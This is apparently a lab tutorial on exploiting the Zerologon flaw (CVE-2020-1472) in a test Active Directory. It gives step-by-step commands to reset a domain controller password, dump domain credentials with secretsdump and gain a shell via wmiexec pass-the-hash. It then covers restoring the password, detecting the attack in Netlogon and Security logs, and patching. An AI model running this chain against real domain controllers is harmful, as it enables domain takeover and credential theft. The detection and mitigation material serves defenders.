Zerologon?? Easy Way To Take Over Active Directory (Exploitation)

Images from wallpapercave

Zerologon is the name of the vulnerability identified in CVE-2020–1472 that was discovered by Secura’s Security Expert Researcher, Tom Tervoort. As a brief explanation, Zerologon was caused by a flaw in the cryptographic authentication scheme used by Netlogon Remote Protocol (MS-NRPC) that causes authentication to be bypassed. By bypassing an authentication token for specific Netlogon functionality, the attacker was able to call a function to set the Domain Controller password to a known value. After that, the attacker can control the Domain Controller and steal the credentials of all registered users on the Domain Controller.

If you want to know more on how Zerologon Attack can easily break the server, you can read an analysis from @_dirkjan here: https://threadreaderapp.com/thread/1306280553281449985.html

Or you can read the Zerologon Original Research and Whitepaper by Secura (Tom Tervoort): https://www.secura.com/blog/zero-logon

Affected Systems

• Windows Server 2008 R2 for x64-based Systems Service Pack 1
• Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
• Windows Server 2012
• Windows Server 2012 (Server Core installation)
• Windows Server 2012 R2
• Windows Server 2012 R2 (Server Core installation)
• Windows Server 2016
• Windows Server 2016 (Server Core installation)
• Windows Server 2019
• Windows Server 2019 (Server Core installation)
• Windows Server, version 1903 (Server Core installation)
• Windows Server, version 1909 (Server Core installation)
• Windows Server, version 2004 (Server Core installation)

Preparation

Before we exploit the Active Directory, we need a few requirement such as :

• Windows Server Vulnerable (in this case, I’ve already installed Windows Server 2016 that has Active Directory Service in the virtual machine. If you want to build an Active Directory in your virtual machine, you can follow step by step on this article https://medium.com/mii-cybersec/build-ad-server-with-kerberos-dan-attacking-kerberos-6358b426be30).
• Python 3.7 (with pip) or higher.
• The latest version of Impacket from Github. (https://github.com/SecureAuthCorp/impacket) with added netlogon structures.
• Zerologon Exploit Script from VoidSec: https://github.com/VoidSec/CVE-2020-1472.

Installing Impacket & Zerologon Exploit Script

1. if you’re using the impacket old version, you can uninstall with this command: apt remove — purge impacket-scripts python3-impacket
2. Clone the latest version of Impacket using this command: git clone https://github.com/SecureAuthCorp/impacket and then cd impacket
3. pip3 install .
4. then, we need to clone Zerologon Exploit Script from repository VoidSec: git clone https://github.com/VoidSec/CVE-2020-1472
5. and install all requirements of these tool using pip in CVE-2020–1472 directory: pip3 install -r requirements.txt

Exploitation

As a note before exploiting the target from VoidSec,

It will likely break things in production environments (eg. DNS functionality, communication with replication Domain Controllers, etc); target clients will then not be able to authenticate to the domain anymore, and they can only be re-synchronized through manual action.

so, carefully if you run this script in the production environment.

In this tutorial, I’ll trying exploit this target until the stage of successfully gaining the shell.

Information gathering of target using Nmap tool

To run the exploit script by VoidSec, firstly we need to know the DC name and should be its NetBIOS computer name of the Domain Controller. To know that, you can use Nbtscan or Nmap tool. If the DC name isn’t correct, the script will likely fail with a STATUS_INVALID_COMPUTER_NAME error.

Description Exploit Script

Using NBTSCAN to get information of NetBIOS Name

after knowing the DC name, we can run the script as follow :

python3 cve-2020–1472-exploit.py -n <DC-NAME> -t <IP-Target>

Running Exploit Script

As we can see, the exploit script will ask for approval to continue the exploit by changing the Domain Controller’s password. If you choose N then the script only works as a checker, if you choose Y then the script should result in Domain Controller’s account password being reset to an empty string.

After you successfully changed the password of the Domain Controller’s account to an empty string, at this point you should be able to run Impacket modules secretsdump.py on **/Impacket/example directory to dump the credentials from Domain Controller, you can use this command :

python3 secretsdump.py -no-pass -just-dc <Domain>/<DC-Name>\$@<IP-Target>

Dumping Domain Credentials from Domain Controller’s

Then you can use the hash obtained from the secretsdump.py results to gain the shell using the wmiexec.py module in **/Impacket/examples directory with this command:

python3 wmiexec.py -hashes <hash-value> <domain>/<User>@<IP-Target>

Successfully RCE on the victim

Password Restore

After successfully changing the DC password, the Active Directory Server doesn’t work properly. Reinstalling the original password hash is necessary for the DC to continue to operate normally.

After you have obtained user Domain Admin, you can run wmiexec.py to the target DC with a credential obtained from secretsdump.py and perform the following steps :

create & downloading a backup registry for restoring the password DC

and then you can run this command on the attacker machine to get the original hash password of DC’s account.

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Original NT Hash of the Machine Account

after that, you can re-install that original machine account hash to the domain using reinstall_original_pw.py, sometimes more than one run is needed before it succeed.

python3 reinstall_original_pw.py <DC-Name> <IP> <ORIGINAL-NT-HASH>

Restoring the password to the original value

to make sure the original password is restored, if you run this command you will see the return as shown below.

python3 secretsdump.py -no-pass -just-dc <Domain>/<DC-Name>\$@<IP-Target>

Return from the script after the password DC’s successfully restored

An Analysis When The Attacker Exploiting This Vulnerability

Since the attacker is exploited in the netlogon protocol, let’s look at the Netlogon log file on C:\Windows\debug\netlogon.txt.But by default, only some events in Windows logs are audited. If you want to enable the Netlogon Debug Mode you can run this command with the administrator privileges on Active Directory Server :

nltest /dbflag:0x2080ffff

The screenshot below shows a few interesting lines that were logged by the Netlogon Service when the attacker exploiting this vulnerability.

Example of Netlogon log during exploitation of the Zerologon Vulnerability

When Netlogon Debug mode is enabled, every step of this attack is logged by the system. Here’s an explanation of the image above :

• Black Box: It’s the first stage of the exploitation process, when the script trying to brute force. This exploit carries out multiple authentication attempts using Netlogon on a domain controller with a ClientChallenge message consisting of 8 zero bytes.
• Blue Box: That’s part when the attacker successfully exploiting the Netlogon Protocol.
• Red Box: That’s part when the attacker successfully changed DC’s password.
• Green Box: That’s the MD5 hash of an empty string in little-endian format.

To make sure the Green Box is MD5 Hash of empty password in little-endian format, check this out :

Convert the little-endian format to MD5 Hash

Result MD5 Decryption

Apart from Netlogon Logs, when the attacker changed the password of a computer account with the empty string, several events are generated in the Security Event Log, including the ANONYMOUS LOGON event with the EventID 4742.

Event 4242 gave the information account password AD-SERVER$ was changed to empty string at 2/23/2021 04:08:23 PM

If the attacker was trying to authenticate or gaining the shell using wmiexec.py, the Security Event Log will generate EventID 4624 and display some information as shown below.

Event 4624 generated from Security Event Log

Based on the picture Event 4624, we can see the attacker IP is 192.168.1.13, trying to authenticate with the Administrator account and using NtLmSsp for the Logon Process, and was logon by type 3 which means the attacker has successfully compromised the target via Network (i.e. connection to shared folder on this computer from elsewhere on the network) at 2/23/2021 4:21:39 PM.

Mitigation

On February 9 2021 Microsoft has announced the second phase of Windows Security Updates to vulnerability CVE-2020–1472 also known as Zerologon. This security update by default enable enforcement mode on all supported Windows Domain Controllers and will block vulnerable connection from non-compliant devices unless manually added to a security group referenced in “Domain Controller: Allow vulnerable Netlogon secure channel connections” group policy. Microsoft strongly recommends to all customers for installing the February 2021 updates to be fully protected from Zerologon Vulnerability.

After I was installed the latest Security Update from Microsoft, I’m tried again to run the Exploit script from VoidSec to check the Zerologon vulnerability still exists or not, and the result from the script shows the Zerologon vulnerability on the victim has been patched.

The victim has been patched

References

Hunting for Zerologon

Zerologon: instantly become domain admin by subverting Netlogon cryptography (CVE-2020-1472) |…

VoidSec/CVE-2020-1472

Build AD Server with Kerberos dan Attacking Kerberos

Windows Security Log Event ID 4624 - An account was successfully logged on

Thread by @_dirkjan on Thread Reader App

Security Update Guide - Microsoft Security Response Center